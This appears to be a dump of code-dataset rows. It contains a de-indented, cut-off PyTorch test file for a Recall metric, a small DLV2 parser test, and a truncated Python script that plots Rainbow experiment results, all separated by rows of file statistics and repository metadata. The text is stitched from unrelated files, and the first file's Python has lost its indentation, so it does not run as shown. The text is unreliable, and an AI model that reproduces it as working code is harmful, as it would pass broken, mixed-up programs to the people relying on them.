assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_binary_input_NL():
# Binary accuracy on input of shape (N, L)
def _test(average):
re = Recall(average=average)
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, 5)).type(torch.LongTensor)
y_pred = torch.rand(10, 5)
y = torch.randint(0, 2, size=(10, 5)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
pr_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(pr_compute)
re.reset()
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, 1, 5)).type(torch.LongTensor)
y_pred = torch.rand(10, 1, 5)
y = torch.randint(0, 2, size=(10, 1, 5)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
pr_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(pr_compute)
_test(average=True)
_test(average=False)
def test_binary_input_NHW():
# Binary accuracy on input of shape (N, H, W)
def _test(average):
re = Recall(average=average)
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, 12, 10)).type(torch.LongTensor)
y_pred = torch.rand(10, 12, 10)
y = torch.randint(0, 2, size=(10, 12, 10)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
re.reset()
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, 1, 12, 10)).type(torch.LongTensor)
y_pred = torch.rand(10, 1, 12, 10)
y = torch.randint(0, 2, size=(10, 1, 12, 10)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_multiclass_wrong_inputs():
re = Recall()
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.rand(10, 5, 4), torch.randint(0, 2, size=(10,)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.rand(10, 5, 6), torch.randint(0, 5, size=(10, 5)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.rand(10), torch.randint(0, 5, size=(10, 5, 6)).type(torch.LongTensor)))
def test_multiclass_input_N():
# Multiclass input data of shape (N, ) and (N, C)
def _test(average):
re = Recall(average=average)
y_pred = torch.rand(20, 6)
y = torch.randint(0, 5, size=(20,)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
re.reset()
y_pred = torch.rand(10, 4)
y = torch.randint(0, 3, size=(10, 1)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
# 2-classes
re.reset()
y_pred = torch.rand(10, 2)
y = torch.randint(0, 2, size=(10, 1)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_multiclass_input_NL():
# Multiclass input data of shape (N, L) and (N, C, L)
def _test(average):
re = Recall(average=average)
y_pred = torch.rand(10, 5, 8)
y = torch.randint(0, 4, size=(10, 8)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
re.reset()
y_pred = torch.rand(15, 10, 8)
y = torch.randint(0, 9, size=(15, 8)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_multiclass_input_NHW():
# Multiclass input data of shape (N, H, W, ...) and (N, C, H, W, ...)
def _test(average):
re = Recall(average=average)
y_pred = torch.rand(10, 5, 18, 16)
y = torch.randint(0, 4, size=(10, 18, 16)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
re.reset()
y_pred = torch.rand(10, 7, 20, 12)
y = torch.randint(0, 6, size=(10, 20, 12)).type(torch.LongTensor)
re.update((y_pred, y))
np_y_pred = y_pred.numpy().argmax(axis=1).ravel()
np_y = y.numpy().ravel()
assert re._type == 'multiclass'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
sklearn_average_parameter = 'macro' if average else None
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UndefinedMetricWarning)
assert recall_score(np_y, np_y_pred, average=sklearn_average_parameter) == pytest.approx(re_compute)
_test(average=True)
_test(average=False)
def test_incorrect_type():
# Tests changing of type during training
def _test(average):
re = Recall(average=average)
y_pred = torch.softmax(torch.rand(4, 4), dim=1)
y = torch.ones(4).type(torch.LongTensor)
re.update((y_pred, y))
y_pred = torch.rand(4, 1)
y = torch.ones(4).type(torch.LongTensor)
with pytest.raises(RuntimeError):
re.update((y_pred, y))
_test(average=True)
_test(average=False)
| 41.320242 | 112 | 0.62755 | 1,925 | 13,677 | 4.30026 | 0.062857 | 0.060401 | 0.026818 | 0.037207 | 0.919063 | 0.907828 | 0.892245 | 0.8705 | 0.851051 | 0.836072 | 0 | 0.029974 | 0.23163 | 13,677 | 330 | 113 | 41.445455 | 0.757731 | 0.119324 | 0 | 0.753247 | 0 | 0 | 0.020991 | 0 | 0 | 0 | 0 | 0.00303 | 0.181818 | 1 | 0.073593 | false | 0 | 0.030303 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
88723aae2a80d045dbecfd3d0253bc2aeef7bb16 | 133 | py | Python | tests/parser/bug.72.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.72.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.72.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
%#maxint=65535.
p :- a. %#int(X), a.
a | na.
"""
output = """
%#maxint=65535.
p :- a. %#int(X), a.
a | na.
"""
| 10.230769 | 21 | 0.398496 | 20 | 133 | 2.65 | 0.45 | 0.415094 | 0.45283 | 0.490566 | 0.792453 | 0.792453 | 0.792453 | 0.792453 | 0.792453 | 0 | 0 | 0.103093 | 0.270677 | 133 | 12 | 22 | 11.083333 | 0.443299 | 0 | 0 | 0.8 | 0 | 0 | 0.752 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
ee38616d72b76e41cade341c553c5270e1f213e0 | 60,249 | py | Python | bin/create-multi-experiment-figures.py | allenai/rainbow | 045d726355364b7495fa2e72bb05316545a5f2b0 | [
"Apache-2.0"
] | 50 | 2021-02-05T17:26:38.000Z | 2022-03-10T13:46:44.000Z | bin/create-multi-experiment-figures.py | allenai/rainbow | 045d726355364b7495fa2e72bb05316545a5f2b0 | [
"Apache-2.0"
] | 5 | 2021-04-04T15:57:33.000Z | 2022-02-10T05:47:30.000Z | bin/create-multi-experiment-figures.py | allenai/rainbow | 045d726355364b7495fa2e72bb05316545a5f2b0 | [
"Apache-2.0"
] | 4 | 2021-04-08T15:41:40.000Z | 2021-08-22T09:55:34.000Z | #! /usr/bin/env python
"""Create multi-experiment figures for the Rainbow results."""
import dataclasses
import functools
import logging
import operator
import os
from typing import Any, Callable, Dict, List, Optional, Tuple
import click
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from sklearn.isotonic import IsotonicRegression
import tqdm
from rainbow import settings, utils
logger = logging.getLogger(__name__)
# constants
N_TO_ROWS_AND_COLS = {
1: (1, 1),
2: (1, 2),
3: (1, 3),
4: (2, 2),
5: (2, 3),
6: (2, 3),
7: (4, 2),
8: (4, 2),
9: (3, 3),
10: (4, 3),
11: (4, 3),
12: (4, 3),
13: (4, 4),
14: (4, 4),
15: (3, 5),
16: (4, 4),
}
"""A mapping from various integers to a number of rows and columns.
This mapping is helpful for creating figures with multiple subfigures
when there's no obvious number of rows and columns.
"""
CENTERLINE_STYLE_KWARGS = {"c": "0.10", "linestyle": ":"}
"""Key-word arguments for styling the y = x lines in the plots."""
LINESTYLES = ["-", "--", "-.", ":"]
"""Line styles to use in the figures."""
# helper functions
def _make_plot_grid(
plot_func: Callable,
x_label: str,
y_label: str,
control_data: pd.DataFrame,
treatment_data: pd.DataFrame,
score_col: str,
match_col: str,
match_fmt: Optional[Callable],
group_col: Optional[str],
group_fmt: Optional[Callable],
group_order: Optional[Callable],
subfigure_col: Optional[str],
subfigure_fmt: Optional[Callable],
subfigure_order: Optional[Callable],
) -> Tuple[plt.Figure, plt.Axes]:
"""Return the grid of plots.
Parameters
----------
plot_func : Callable, required
A function taking the ``group_to_data`` dictionary and an ``ax``
axis object.
x_label : str, required
The label for the x-axis (control).
y_label : str, required
The label for the y-axis (treatment).
control_data : pd.DataFrame, required
The data for the control.
treatment_data : pd.DataFrame, required
The data for the treatments.
score_col : str, required
The name of the column containing the score.
match_col : str, required
The column to use for matching control and treatment scores
together.
match_fmt : Optional[Callable], required
A function to apply to the match column.
group_col : Optional[str], required
The column to use as a key for coloring the points, which will
be labeled in the legend (e.g. the treatments).
group_fmt : Optional[Callable], required
A function to format group labels for the legend.
group_order : Optional[Callable], required
A function to be called as a sort key when ordering the groups.
subfigure_col : Optional[str], required
The column to use to split the figure up into subfigures.
subfigure_fmt : Optional[Callable], required
A function to format the title for each subfigure.
subfigure_order : Optional[Callable], required
A function to be called as a sort key when ordering the
subfigures.
Returns
-------
Tuple[plt.Figure, np.ndarray[plt.Axes]]
A tuple containing the figure and its axes.
"""
# Replace null function arguments with the identity.
def identity(x):
return x
match_fmt = match_fmt or identity
group_fmt = group_fmt or identity
group_order = group_order or identity
subfigure_fmt = subfigure_fmt or identity
subfigure_order = subfigure_order or identity
# Construct important constants.
groups = (
sorted(treatment_data[group_col].unique(), key=group_order)
if group_col is not None
else [None]
)
subfigures = (
sorted(treatment_data[subfigure_col].unique(), key=subfigure_order)
if subfigure_col is not None
else [None]
)
n_rows, n_cols = N_TO_ROWS_AND_COLS[len(subfigures)]
# Initialize the figure.
fig, axes = plt.subplots(
nrows=n_rows,
ncols=n_cols,
figsize=(4 * n_cols, 4 * n_rows),
constrained_layout=True,
)
# Modify axes so we can access the axis objects in a uniform way,
# regardless of the number of rows or columns.
if not isinstance(axes, np.ndarray):
axes = np.array([axes])
axes = axes.reshape(n_rows, n_cols)
# Plot the subfigures.
for i, subfigure in enumerate(subfigures):
control_subdata = (
control_data[control_data[subfigure_col] == subfigure]
if subfigure_col is not None
else control_data
)
treatment_subdata = (
treatment_data[treatment_data[subfigure_col] == subfigure]
if subfigure_col is not None
else treatment_data
)
# Compute the data to plot for each group.
group_to_data = {}
for group in groups:
# Join the treatment and control data for the group.
pairs = pd.merge(
treatment_subdata[treatment_subdata[group_col] == group]
if group_col is not None
else treatment_subdata,
control_subdata,
how="left",
on=match_col,
suffixes=("_treatment", "_control"),
)
group_to_data[group_fmt(group)] = {
"matches": pairs[match_col].apply(match_fmt).values,
"control_scores": pairs[f"{score_col}_control"].values,
"treatment_scores": pairs[f"{score_col}_treatment"].values,
}
plot_func(
group_to_data=group_to_data, ax=axes[i // n_cols][i % n_cols],
)
# Display the legend.
axes[i // n_cols][i % n_cols].legend()
# Set the subfigure's title.
axes[i // n_cols][i % n_cols].set_title(subfigure_fmt(subfigure))
for i in range(n_cols):
axes[-1][i].set_xlabel(x_label)
for i in range(n_rows):
axes[i][0].set_ylabel(y_label)
return fig, axes
def plot_paired_performance(
control_data: pd.DataFrame,
treatment_data: pd.DataFrame,
score_col: str,
match_col: str,
match_fmt: Optional[Callable],
group_col: Optional[str],
group_fmt: Optional[Callable],
group_order: Optional[Callable],
subfigure_col: Optional[str],
subfigure_fmt: Optional[Callable],
subfigure_order: Optional[Callable],
) -> Tuple[plt.Figure, plt.Axes]:
"""Return the paired performance plot.
Parameters
----------
control_data : pd.DataFrame, required
The data for the controls.
treatment_data : pd.DataFrame, required
The data for the treatments.
score_col : str, required
The name of the column containing the score.
match_col : str, required
The column to use for matching control and treatment scores
together (e.g., the task).
match_fmt : Optional[Callable], required
A function to apply to the match column.
group_col : Optional[str], required
The column to use as a key for coloring the points, which will
be labeled in the legend (e.g. the treatments).
group_fmt : Optional[Callable], required
A function to format group labels for the legend.
group_order : Optional[Callable], required
A function to be called as a sort key when ordering the groups.
subfigure_col : Optional[str], required
The column to use to split the figure up into subfigures.
subfigure_fmt : Optional[str], required
A function to format the title for each subfigure.
subfigure_order : Optional[Callable], required
A function to be called as a sort key when ordering the
subfigures.
Returns
-------
Tuple[plt.Figure, np.ndarray[plt.Axes]]
A tuple containing the figure and its axes.
"""
def plot_func(group_to_data, ax):
for group, data in group_to_data.items():
matches = data["matches"]
control_scores = data["control_scores"]
treatment_scores = data["treatment_scores"]
ax.scatter(control_scores, treatment_scores, label=group)
for match, x, y in zip(matches, control_scores, treatment_scores):
ax.annotate(match, (x, y))
# Scale the x and y limits
min_score = min(
min(data["treatment_scores"].min(), data["control_scores"].min())
for data in group_to_data.values()
)
max_score = max(
max(data["treatment_scores"].max(), data["control_scores"].max())
for data in group_to_data.values()
)
ax.set_xlim(0.99 * min_score, 1.01 * max_score)
ax.set_ylim(0.99 * min_score, 1.01 * max_score)
# Plot the y = x line.
ax.plot(
[0.99 * min_score, 1.01 * max_score],
[0.99 * min_score, 1.01 * max_score],
**CENTERLINE_STYLE_KWARGS,
)
return _make_plot_grid(
plot_func=plot_func,
x_label="control score (accuracy)",
y_label="treatment score (accuracy)",
control_data=control_data,
treatment_data=treatment_data,
score_col=score_col,
match_col=match_col,
match_fmt=match_fmt,
group_col=group_col,
group_fmt=group_fmt,
group_order=group_order,
subfigure_col=subfigure_col,
subfigure_fmt=subfigure_fmt,
subfigure_order=subfigure_order,
)
def plot_cost_equivalent_curves(
control_data: pd.DataFrame,
treatment_data: pd.DataFrame,
score_col: str,
match_col: str,
match_fmt: Optional[Callable],
group_col: Optional[str],
group_fmt: Optional[Callable],
group_order: Optional[Callable],
subfigure_col: Optional[str],
subfigure_fmt: Optional[Callable],
subfigure_order: Optional[Callable],
) -> Tuple[plt.Figure, plt.Axes]:
"""Return the cost equivalent curve plot.
Parameters
----------
control_data : pd.DataFrame, required
The data for the control.
treatment_data : pd.DataFrame, required
The data for the treatments.
score_col : str, required
The name of the column containing the score.
match_col : str, required
The column to use for matching control and treatment scores
together (e.g., the training data size).
match_fmt : Optional[Callable], required
Unused.
group_col : Optional[str], required
The column to use as a key for coloring the points, which will
be labeled in the legend (e.g. the treatments).
group_fmt : Optional[Callable], required
A function to format group labels for the legend.
group_order : Optional[Callable], required
A function to be called as a sort key when ordering the groups.
subfigure_col : Optional[str], required
The column to use to split the figure up into subfigures.
subfigure_fmt : Optional[str], required
A function to format the title for each subfigure.
subfigure_order : Optional[Callable], required
A function to be called as a sort key when ordering the
subfigures.
Returns
-------
Tuple[plt.Figure, np.ndarray[plt.Axes]]
A tuple containing the figure and its axes.
"""
def plot_func(group_to_data, ax):
for i, (group, data) in enumerate(group_to_data.items()):
matches = data["matches"]
control_scores = data["control_scores"]
treatment_scores = data["treatment_scores"]
# Fit isotonic curves for the control and treatment learning
# curves, as well as the isotonic curves' inverses.
min_size = matches.min()
max_size = matches.max()
xs = np.linspace(min_size, max_size, num=2500)
control_smoother = IsotonicRegression(out_of_bounds="clip").fit(
matches, control_scores
)
treatment_smoother = IsotonicRegression(out_of_bounds="clip").fit(
matches, treatment_scores
)
treatment_smoother_inv = IsotonicRegression(
out_of_bounds="clip"
).fit(treatment_smoother.predict(xs), xs)
# Plot the cost equivalent curve.
ax.plot(
xs,
treatment_smoother_inv.predict(control_smoother.predict(xs)),
linestyle=LINESTYLES[i],
label=group,
)
# Plot the original data points after smoothing, since we
# can't align them without smoothing.
ax.scatter(
matches,
treatment_smoother_inv.predict(
control_smoother.predict(matches)
),
c="k",
s=8,
)
# Scale the x and y limits
ax.set_xlim(0.99 * min_size, 1.01 * max_size)
ax.set_ylim(0.99 * min_size, 1.01 * max_size)
# Plot the y = x line.
ax.plot(
[0.99 * min_size, 1.01 * max_size],
[0.99 * min_size, 1.01 * max_size],
**CENTERLINE_STYLE_KWARGS,
)
# Set the x and y ticks.
ticks = np.linspace(min_size, max_size, num=5)[1:]
tick_labels = [
f"{x/1000:.1f}".rstrip("0").rstrip(".") + "k"
if x / 1000 > 1.0
else f"{x:f}"
for x in ticks
]
ax.set_xticks(ticks)
ax.set_xticklabels(tick_labels)
ax.set_yticks(ticks)
ax.set_yticklabels(tick_labels)
# Add the second axis at the top of the figure.
def cost2perf(x):
if len(x) == 0:
return x
return control_smoother.predict(x.reshape(-1)).tolist()
ax2 = ax.twiny()
ax2.set_xlim(ax.get_xlim())
ax2.set_xticks(ticks)
ax2.set_xticklabels([f"{x:.3f}" for x in cost2perf(ticks)])
return _make_plot_grid(
plot_func=plot_func,
x_label="baseline examples",
y_label="new method examples",
control_data=control_data,
treatment_data=treatment_data,
score_col=score_col,
match_col=match_col,
match_fmt=None,
group_col=group_col,
group_fmt=group_fmt,
group_order=group_order,
subfigure_col=subfigure_col,
subfigure_fmt=subfigure_fmt,
subfigure_order=subfigure_order,
)
def plot_performance_equivalent_curves(
control_data: pd.DataFrame,
treatment_data: pd.DataFrame,
score_col: str,
match_col: str,
match_fmt: Optional[Callable],
group_col: Optional[str],
group_fmt: Optional[Callable],
group_order: Optional[Callable],
subfigure_col: Optional[str],
subfigure_fmt: Optional[Callable],
subfigure_order: Optional[Callable],
) -> Tuple[plt.Figure, plt.Axes]:
"""Return the performance equivalent curve plot.
Parameters
----------
control_data : pd.DataFrame, required
The data for the controls.
treatment_data : pd.DataFrame, required
The data for the treatments.
score_col : str, required
The name of the column containing the score.
match_col : str, required
The column to use for matching control and treatment scores
together (e.g., the size).
match_fmt : Optional[Callable], required
Unused.
group_col : Optional[str], required
The column to use as a key for coloring the points, which will
be labeled in the legend (e.g. the treatments).
group_fmt : Optional[Callable], required
A function to format group labels for the legend.
group_order : Optional[Callable], required
A function to be called as a sort key when ordering the groups.
subfigure_col : Optional[str], required
The column to use to split the figure up into subfigures.
subfigure_fmt : Optional[str], required
A function to format the title for each subfigure.
subfigure_order : Optional[Callable], required
A function to be called as a sort key when ordering the
subfigures.
Returns
-------
Tuple[plt.Figure, np.ndarray[plt.Axes]]
A tuple containing the figure and its axes.
"""
def plot_func(group_to_data, ax):
for i, (group, data) in enumerate(group_to_data.items()):
matches = data["matches"]
control_scores = data["control_scores"]
treatment_scores = data["treatment_scores"]
# Fit isotonic curves for the control and treatment learning
# curves, as well as the isotonic curves' inverses.
min_size = matches.min()
max_size = matches.max()
xs = np.linspace(min_size, max_size, num=2500)
control_smoother = IsotonicRegression(out_of_bounds="clip").fit(
matches, control_scores
)
control_smoother_inv = IsotonicRegression(out_of_bounds="clip").fit(
control_smoother.predict(xs), xs
)
treatment_smoother = IsotonicRegression(out_of_bounds="clip").fit(
matches, treatment_scores
)
# Plot the performance equivalent curve.
ax.plot(
control_smoother.predict(xs),
treatment_smoother.predict(xs),
linestyle=LINESTYLES[i],
label=group,
)
# Plot the original data points without smoothing, since
# they're already aligned (i.e., trained on the same amount
# of data).
ax.scatter(
control_scores, treatment_scores, c="k", s=8,
)
# Compute the minimum and maximum scores.
min_score = min(
min(data["control_scores"].min(), data["treatment_scores"].min())
for data in group_to_data.values()
)
max_score = max(
max(data["control_scores"].max(), data["treatment_scores"].max())
for data in group_to_data.values()
)
# Scale the x and y limits
ax.set_xlim(0.99 * min_score, 1.01 * max_score)
ax.set_ylim(0.99 * min_score, 1.01 * max_score)
# Plot the y = x line.
ax.plot(
[0.99 * min_score, 1.01 * max_score],
[0.99 * min_score, 1.01 * max_score],
**CENTERLINE_STYLE_KWARGS,
)
# Set the x and y ticks.
ticks = np.linspace(min_score, max_score, num=5)[1:]
tick_labels = [f"{x:.2f}" for x in ticks]
ax.set_xticks(ticks)
ax.set_xticklabels(tick_labels)
ax.set_yticks(ticks)
ax.set_yticklabels(tick_labels)
# Add the second axis at the top of the figure.
def perf2cost(x):
if len(x) == 0:
return x
return control_smoother_inv.predict(x.reshape(-1)).tolist()
ax2 = ax.twiny()
ax2.set_xlim(ax.get_xlim())
ax2.set_xticks(ticks)
ax2.set_xticklabels([f"{int(x):d}" for x in perf2cost(ticks)])
return _make_plot_grid(
plot_func=plot_func,
x_label="baseline accuracy",
y_label="new method accuracy",
control_data=control_data,
treatment_data=treatment_data,
score_col=score_col,
match_col=match_col,
match_fmt=None,
group_col=group_col,
group_fmt=group_fmt,
group_order=group_order,
subfigure_col=subfigure_col,
subfigure_fmt=subfigure_fmt,
subfigure_order=subfigure_order,
)
# figure configuration
@dataclasses.dataclass
class FigureConfig:
"""A configuration object for a figure."""
fig_name: str
control_fname: str
treatment_fname: str
score_col: str
hyper_param_cols: List[str]
control_split_key: List[str]
treatment_split_key: List[str]
plot_func: Callable
plot_kwargs: Dict[str, Any]
TOPIC_TO_FIGURE_CONFIG = {
"effect-of-size": [
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=["model_size", "multiset"],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {"commonsenseqa": "CQA"}[x],
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["task"],
treatment_split_key=["task", "multiset"],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "model_size",
"subfigure_fmt": str.capitalize,
"subfigure_order": lambda x: {
"small": 0,
"base": 1,
"large": 2,
}[x],
},
),
FigureConfig(
fig_name="learning-curves_compare-transfer-methods_performance-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["task"],
treatment_split_key=["task", "multiset"],
plot_func=plot_performance_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "transfer_method",
"group_fmt": lambda x: {
"multi-task": "multitask",
"multi-task-fine-tune": "fine-tune",
"sequential-fine-tune": "sequential",
}[x],
"group_order": lambda x: {
"multi-task": 0,
"multi-task-fine-tune": 1,
"sequential-fine-tune": 2,
}[x],
"subfigure_col": "model_size",
"subfigure_fmt": str.capitalize,
"subfigure_order": lambda x: {
"small": 0,
"base": 1,
"large": 2,
}[x],
},
),
],
"transferring-knowledge-graphs": [
FigureConfig(
fig_name="full-task_compare-multisets_pair-plot",
control_fname="single-task_full-tasks/table.csv",
treatment_fname="multiset_full-tasks/table.csv",
score_col="best_score",
hyper_param_cols=["direction", "rate", "lr"],
control_split_key=["model_size"],
treatment_split_key=[
"model_size",
"knowledge-graph",
"transfer_method",
],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"knowledge-graph": "none",
"rainbow-knowledge-graph": "Rainbow",
}[x],
"group_order": lambda x: {
"knowledge-graph": 0,
"rainbow-knowledge-graph": 1,
}[x],
"subfigure_col": None,
"subfigure_fmt": None,
"subfigure_order": None,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_pair-plot",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=[
"model_size",
"knowledge-graph",
"transfer_method",
],
plot_func=plot_paired_performance,
plot_kwargs={
"match_col": "task",
"match_fmt": lambda x: {
"anli": "aNLI",
"cosmosqa": "CosmosQA",
"hellaswag": "HellaSWAG",
"physicaliqa": "PIQA",
"socialiqa": "SocialIQa",
"winogrande": "WinoGrande",
}[x],
"group_col": "multiset",
"group_fmt": lambda x: {
"knowledge-graph": "none",
"rainbow-knowledge-graph": "Rainbow",
}[x],
"group_order": lambda x: {
"knowledge-graph": 0,
"rainbow-knowledge-graph": 1,
}[x],
"subfigure_col": "size",
"subfigure_fmt": "# train examples: {:d}".format,
"subfigure_order": int,
},
),
FigureConfig(
fig_name="learning-curves_compare-multisets_cost-equivalent-curve",
control_fname="single-task_learning-curves/table.csv",
treatment_fname="multiset_learning-curves/table.csv",
score_col="best_score",
hyper_param_cols=["lr"],
control_split_key=["model_size"],
treatment_split_key=[
"model_size",
"knowledge-graph",
"transfer_method",
],
plot_func=plot_cost_equivalent_curves,
plot_kwargs={
"match_col": "size",
"match_fmt": None,
"group_col": "multiset",
"group_fmt": lambda x: {
"knowledge-graph": "none",
"rainbow-knowledge-graph": "Rainbow",
